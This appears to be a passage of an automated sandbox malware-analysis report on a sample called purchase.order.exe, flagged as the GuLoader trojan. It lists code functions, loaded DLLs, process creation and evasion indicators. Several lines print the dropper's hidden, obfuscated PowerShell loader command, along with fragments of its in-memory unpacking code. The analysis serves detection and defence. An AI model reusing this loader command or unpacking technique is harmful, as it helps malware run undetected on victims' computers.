      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B02E908_2_21B02E90
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BACE938_2_21BACE93
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAEEDB8_2_21BAEEDB
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAEE268_2_21BAEE26
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF0E598_2_21AF0E59
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AFB1B08_2_21AFB1B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BBB16B8_2_21BBB16B
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B2516C8_2_21B2516C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADF1728_2_21ADF172
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA70E98_2_21BA70E9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAF0E08_2_21BAF0E0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF70C08_2_21AF70C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9F0CC8_2_21B9F0CC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B3739A8_2_21B3739A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA132D8_2_21BA132D
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21ADD34C8_2_21ADD34C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF52A08_2_21AF52A0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B912ED8_2_21B912ED
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0B2C08_2_21B0B2C0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8D5B08_2_21B8D5B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA75718_2_21BA7571
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAF43F8_2_21BAF43F
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE14608_2_21AE1460
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAF7B08_2_21BAF7B0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE17EC8_2_21AE17EC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA16CC8_2_21BA16CC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B356308_2_21B35630
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B859108_2_21B85910
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0B9508_2_21B0B950
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF99508_2_21AF9950
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF38E08_2_21AF38E0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B5D8008_2_21B5D800
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0FB808_2_21B0FB80
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B65BF08_2_21B65BF0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B2DBF98_2_21B2DBF9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAFB768_2_21BAFB76
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B35AA08_2_21B35AA0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B8DAAC8_2_21B8DAAC
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B91AA38_2_21B91AA3
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B9DAC68_2_21B9DAC6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B63A6C8_2_21B63A6C
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAFA498_2_21BAFA49
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA7A468_2_21BA7A46
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B0FDC08_2_21B0FDC0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA7D738_2_21BA7D73
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BA1D5A8_2_21BA1D5A
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF3D408_2_21AF3D40
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAFCF28_2_21BAFCF2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21B69C328_2_21B69C32
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAFFB18_2_21BAFFB1
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF1F928_2_21AF1F92
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AB3FD28_2_21AB3FD2
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AB3FD58_2_21AB3FD5
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21BAFF098_2_21BAFF09
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AF9EB08_2_21AF9EB0
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21ADB970 appears 283 times
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21B37E54 appears 111 times
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21B25130 appears 58 times
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21B6F290 appears 105 times
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: String function: 21B5EA12 appears 86 times
      Source: purchase.order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@0/1
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
      Source: C:\Users\user\Desktop\purchase.order.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
      Source: C:\Users\user\Desktop\purchase.order.exeFile created: C:\Users\user\AppData\Local\Temp\nsm43AE.tmpJump to behavior
      Source: purchase.order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\purchase.order.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: purchase.order.exeReversingLabs: Detection: 18%
      Source: C:\Users\user\Desktop\purchase.order.exeFile read: C:\Users\user\Desktop\purchase.order.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\purchase.order.exe "C:\Users\user\Desktop\purchase.order.exe"
      Source: C:\Users\user\Desktop\purchase.order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Fathoming.exe "C:\Users\user\AppData\Local\Temp\Fathoming.exe"
      Source: C:\Users\user\Desktop\purchase.order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Fathoming.exe "C:\Users\user\AppData\Local\Temp\Fathoming.exe"Jump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: purchase.order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: stem.Core.pdba source: powershell.exe, 00000002.00000002.2642154478.0000000006D9F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: Fathoming.exe, 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2950366409.0000000021901000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Fathoming.exe, Fathoming.exe, 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmp, Fathoming.exe, 00000008.00000003.2950366409.0000000021901000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Fathoming.exe, 00000008.00000001.2634328623.0000000000649000.00000020.00000001.01000000.00000008.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.2661158092.0000000008F37000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Mailperson220 $Perquisites $Hovmodets), (brugerinformation @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Cumberer = [AppDomain]::CurrentDomain.GetAssembl
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Besnare38)), $gardinprdikenernes).DefineDynamicModule($Oplagsmssigt, $false).DefineType($Godkendelsesbestemmelsernes, $Vidje, [System.
      Suspicious powershell command line found
      Source: C:\Users\user\Desktop\purchase.order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)
      Source: C:\Users\user\Desktop\purchase.order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AB225F pushad ; ret 8_2_21AB27F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AB27FA pushad ; ret 8_2_21AB27F9
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AE09AD push ecx; mov dword ptr [esp], ecx8_2_21AE09B6
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AB283D push eax; iretd 8_2_21AB2858
      Source: C:\Users\user\AppData\Local\Temp\Fathoming.exeCode function: 8_2_21AB1368 push eax; iretd 8_2_21AB1369
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Fathoming.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\purchase.order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
